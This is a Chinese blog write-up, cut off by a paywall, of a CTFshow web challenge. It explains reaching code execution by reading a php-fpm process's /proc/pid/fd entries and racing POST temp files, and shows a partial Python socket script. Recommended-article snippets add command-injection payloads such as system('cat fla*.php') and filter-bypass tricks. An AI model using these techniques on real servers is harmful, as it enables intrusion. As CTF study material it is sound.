CTFSHOW 套娃shell

最新推荐文章于 2024-10-08 14:21:28 发布
原创 最新推荐文章于 2024-10-08 14:21:28 发布 · 2.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf #php #python #java

本文介绍了如何通过CTF比赛中的一个漏洞,利用PHP环境和nginx日志,通过文件描述符(fd)进行远程代码执行。作者首先分析了请求头的规则,发现可以通过修改Host字段来绕过限制。接着,利用日志文件的可控性,尝试读取php-fpm进程的fd目录下的文件,最终找到并读取了access.log。虽然尝试通过shell_exec执行命令失败,但作者转向了通过POST大量数据触发临时文件创建,再遍历fd来执行命令的方法。实验中使用了多线程同时进行POST数据上传和遍历fd,成功实现了远程代码执行。
该文章已生成可运行项目,

CTFSHOW 套娃shell

1、题目给的是用nc连接的,测试了下,传个请求包过去就可以了,比如(最后的换行不要忘了):

GET /?file=/a HTTP/1.1
Host: 127.0.0.1
Connection: close

但是又不是完全是按照这个请求包来的,把host改成其他的,也是可以成功。说明不是完全按照请求头的规则来读取的。
题目里面的正则表达式大概意思就是以/开头,并且后面只能有数字字母和/
我们需要在服务器上构造一个文件,并且文件内容是可控的,或者是服务器本身就有这样的文件也是可以的。
思来想去只能是构造一个临时文件,或者可以日志可控。
2、根据返回的请求包可以看到题目环境是php7.3.2+nginx,所以日志一般位置为/var/log/nginx/access.log。很不幸文件名存在点号。
3、如果单纯的上传文件然后留下/tmp/phpxxxxxx形式的文件的话,爆破的可能性微乎其微,况且文件不是永久存在的。
4、最后对于我来说可以考虑的就只剩文件描述符了。/proc/pid/fd/xxx可能存在web日志。而pid我们通过传一个不带参数的get请求就可以得到。

在这里插入图片描述
比如我这个是125。
经过测试循环跑上一段时间就可以读到日志

import socket
import re
s=socket.socket()
s.connect(('pwn.challenge.ctf.show',28099))
s.send(f'''GET / HTTP/1.1
Host:127.0.0.1

	'''.encode())
data=s.recv(1024).decode()
s.close()
pid = re.findall('(.*?) www-data',data)[0].strip()
while True:
	for i in range(0,256):
		s=socket.socket()
		s.connect(('pwn.challenge.ctf.show',28099))
		file=f"/proc/{
     
     pid}/fd/
本文章已经生成可运行项目
最低0.47元/天 解锁文章
yu22x
关注
【misc】ctfshow-stega10 --套娃
question55的博客
11-04 671
crc_list = [0xf3b61b28, 0xf3b61b38, 0x6abf4a82, 0x5ed1937e,0x09b9265b,0x84b12bae,0x70659eff,0x90b077e1,0x6abf4a82]#文件的CRC32值列表,注意顺序。char_crc = binascii.crc32(char1.encode())#获取遍历字符的CRC32值。if calc_crc == crc_value:#将每个字符的CRC32值与每个文件的CRC32值进行匹配。flag{我好难啊}
[ctfshow web入门]常用姿势817-820 &&虎符ctf ezphp
weixin_45751765的博客
05-09 1546
0x00 前言 接上一篇继续记录ctfshow web入门常用姿势 嗝 820 非常规文件上传 php中的base64_decode只对合法字符合并后进行解码,非法字符会直接丢弃,不参与整体的base64解码 合法字符包括 A-Za-z0-9/+ 字母26+26 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-04-30 10:52:40 # @Last Modified by: h1xa # @Last Mod
ctf (套娃)
Glacier_Mount的博客
07-21 6633
键盘流量
CTF2020]套娃 1
weixin_46196627的博客
02-04 354
file_get_contents() 函数把整个文件读入一个字符串中。绕过preg_match 使用%0a换行符占位 23333%0a。php在解析变量名的时候会把+,%20,*,{,[解析为_使用data://text/plain;fuckjs代码,在console运行 得到提示。代码中用单引号和===强比较 字符串。利用php字符串解析特性bypass。使用Cilent-ip为请求ip。
BugkuCTF-MISC题简单套娃
am_03的博客
09-04 1135
打开题目,是一个图片。 丢进010发现有两个jpg头 把第二个FFD8FFE0后面一起复制下来,另存为一个新的图片。 丢进StegSolve,发现别的图层存在flag。 点击下方的左右箭头变换, 若flag实在看不清,两张图放进Stegsolve的Image Combiner通过SUB(RGB separate)模式看一下(相互变换两张图片打开顺序) ...
NSSCTF(MISC)—[MoeCTF 2022]zip套娃
最新发布
hzhfhsq的博客
10-08 883
010打开,发现zip是伪加密,01改为00。ARCHPR爆破,得到密码。打开txt 发现是掩码。txt打开得到flag。
ctfshow套娃shell
08-24
CTFSHOW套娃shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套娃shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...
CTFshow-WEB入门-命令执行
热门推荐
feng的博客
01-20 1万+
web29 ?c=system("cat fla*.php"); 或者 连蚁剑得flag。 web30 或者其他姿势,因为过滤太少,命令执行得函数很多,绕过姿势也很多,因此不列举了。 web31 或者 ?c=echo`tac%09fl*`; web32 利用自己以前没有注意过得一个点。 if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ 过滤了括号和分号确实有些难受。过滤了括号只能用无括号的
平静的ctfshow 1024杯(部分writeup)
qq_46041723的博客
11-15 1255
1024前言MISC一 、签到重新签到兔耳 前言 平淡的一周又开始了,学习从变菜开始!!加油 MISC 一 、签到 打开题目,提示下载压缩包,解压之后发现了两个文本文档 在说明(提示)里面讲到 所以先理出来自己对于这个题的思路。 一、flag是一个连续的字符串,在文档中包含,但是不会是完整的。 二、上一个目标的第二个数值是下一个目标的第一个数值。 三、其他的没看懂,可能是因为菜。 然后就用notepad++ 打开,进行搜索。首先尝试ag ,发现运气不错。 当然有很多个目标,但是经过尝试之后只有这个是正确的
[CTFSHOW]给你shell-Writeup
Y4tacker的博客
11-28 2524
文章目录前言给你shell 前言 学习网上各大佬的姿势进行学习,很开心 给你shell 审查元素,发现关键信息 ①<!--flag is in /flag.txt--> ②<a href='./?view_source' 下面进行最枯燥的代码审计环节啦~~ <?php error_reporting(0); include "config.php"; //这句话没啥用跳过 if (isset($_GET['view_source'])) { show_source(__FI
CTF-压缩包套娃爆破脚本
半岛铁盒的博客
12-26 9199
描述 压缩包名字就是密码, 解开后 直到74168.zip 一层套一层 脚本 import zipfile import re zipname = "D:\\001\\ziptest\\"+"misc.zip" while True: if zipname != "D:\\001\\ziptest\\73168.zip": ts1 = zipfile.ZipFile(zipname) #print ts1.namelist()[0]
ctf.show_36D杯_web_给你shell
qq_45628145的博客
05-22 1966
ctf.show_36D杯_web_给你shell 进入题目,f12,有个链接view_source,还有个提示说flag在flag.txt里面,访问得到源码,下面是源码及分析 <?php //It's no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "config.php"; if (isset($_GET['view_source'])) {
ctfer的web日常:给你shellctfshow
Hunter1_1的博客
03-21 1022
因为数字与0xC0为0;所有可以得知$flag_md5前3位为数字;故secret = 115满足$obj['secret']!查看源码,发现“/?发现好多东西都被禁了;
CTF压缩包套娃脚本(来不及通用化了,凑合着看吧)
Rick66Ashley的博客
01-16 2331
【代码】CTF压缩包套娃脚本(来不及通用化了,凑合着看吧)
[MRCTF2020]套娃 ctf web buuctf
wuyaowangchuan的博客
11-11 1285
打开之后 源代码 $query = $_SERVER['QUERY_STRING'];// if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo "y.
利用PHP的字符串解析特性绕过Waf
qq_45521281的博客
05-01 4812
PHP的字符串解析特性 我们知道PHP将查询字符串(在URL或正文中)转换为内部关联数组$_GET或关联数组$_POST。例如:/?foo=bar变成Array([foo] => “bar”)。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WA...
Linux反弹shell(一)文件描述符与重定向
Hunt Counter
10-24 434
0X00 前言 由于在反弹shell的过程中有一些精简的语句一直没有弄明白,今天特意写文章总结这里面最难的文件描述符和重定向的部分。 0X01 文件描述符 linux文件描述符:可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。 当Linux启动的时候会默认打开三个文件描述符,分别是: 标准输入standard inpu...
[MRCTF2020]套娃
m0_52199518的博客
04-22 827
WP 文章目录WP第一层第一个if第二个if第二层解码传参第三层ip判定data伪协议change解密 千层饼PHP题,非常适合新手学习,考察绕过,编码方式 第一层 在源码中,发现hint <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if(
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值